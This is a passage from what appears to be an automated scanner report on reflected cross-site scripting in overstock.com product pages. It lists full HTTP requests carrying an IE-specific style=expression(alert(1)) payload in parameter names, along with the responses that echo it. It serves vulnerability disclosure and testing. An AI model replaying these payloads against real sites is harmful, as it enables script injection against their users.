Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3876012|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:45 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="ca310"style="x:expression(alert(1))"3bd84c4e9aa" value="1"/>
...[SNIP]...

2.43. http://www.overstock.com/Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e55d"style%3d"x%3aexpression(alert(1))"6104c3f7437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e55d"style="x:expression(alert(1))"6104c3f7437 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Journee-Collection-Womens-Oversize-Sunglasses/4101368/product.html?5e55d"style%3d"x%3aexpression(alert(1))"6104c3f7437=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:23 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:24 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4101368|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:24 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404763982:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:24 GMT; Path=/
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="5e55d"style="x:expression(alert(1))"6104c3f7437" value="1"/>
...[SNIP]...

2.44. http://www.overstock.com/Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21359"style%3d"x%3aexpression(alert(1))"b582e3e7a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21359"style="x:expression(alert(1))"b582e3e7a97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Journee-Womens-Knee-high-Platform-Slouch-Boots/5158589/product.html?21359"style%3d"x%3aexpression(alert(1))"b582e3e7a97=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:49 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:49 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408269564:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:49 GMT; Path=/
Set-Cookie: mxcproclicks=5158589|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:49 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 119999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="21359"style="x:expression(alert(1))"b582e3e7a97" value="1"/>
...[SNIP]...

2.45. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f41e1"style%3d"x%3aexpression(alert(1))"97eb311cfad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f41e1"style="x:expression(alert(1))"97eb311cfad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-New-York-Chain-of-Command-Large-Hobo/4844370/product.html?f41e1"style%3d"x%3aexpression(alert(1))"97eb311cfad=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:42 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4844370|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:42 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408202136:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106682

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="f41e1"style="x:expression(alert(1))"97eb311cfad" value="1"/>
...[SNIP]...

2.46. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42221"style%3d"x%3aexpression(alert(1))"04a83355377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42221"style="x:expression(alert(1))"04a83355377 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Down-Coat/4852352/product.html?42221"style%3d"x%3aexpression(alert(1))"04a83355377=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:01:36 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:01:36 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:01:36 GMT; Path=/
Set-Cookie: mxcproclicks=4852352|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:01:36 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404896720:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=39
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="42221"style="x:expression(alert(1))"04a83355377" value="1"/>
...[SNIP]...

2.47. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 152b5"style%3d"x%3aexpression(alert(1))"c6b4c300c57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 152b5"style="x:expression(alert(1))"c6b4c300c57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-New-York-Mens-Wool-Blend-Herringbone-Overcoat/4852362/product.html?152b5"style%3d"x%3aexpression(alert(1))"c6b4c300c57=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:58:59 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:58:59 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4852362|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:59 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404739243:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:58:59 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="152b5"style="x:expression(alert(1))"c6b4c300c57" value="1"/>
...[SNIP]...

2.48. http://www.overstock.com/Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3508"style%3d"x%3aexpression(alert(1))"82e2010aa3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3508"style="x:expression(alert(1))"82e2010aa3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Kenneth-Cole-Unlisted-Street-Smart-Large-Hobo-Bag/5144756/product.html?d3508"style%3d"x%3aexpression(alert(1))"82e2010aa3f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:34 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:34 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408194814:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:34 GMT; Path=/
Set-Cookie: mxcproclicks=5144756|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:34 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=66
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112970

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ke
...[SNIP]...
<input type="hidden" name="d3508"style="x:expression(alert(1))"82e2010aa3f" value="1"/>
...[SNIP]...

2.49. http://www.overstock.com/Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5ae3"style%3d"x%3aexpression(alert(1))"4290b54e8c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5ae3"style="x:expression(alert(1))"4290b54e8c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Liliana-by-Adi-Womens-Faux-Suede-High-heel-Boots/3699769/product.html?e5ae3"style%3d"x%3aexpression(alert(1))"4290b54e8c5=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:53:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:53:39 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404419643:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:39 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3699769|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 121105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Li
...[SNIP]...
<input type="hidden" name="e5ae3"style="x:expression(alert(1))"4290b54e8c5" value="1"/>
...[SNIP]...

2.50. http://www.overstock.com/Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/London-Times-Womens-Cap-Sleeve-Seamed-Dress/5067276/product.html

Issue detail

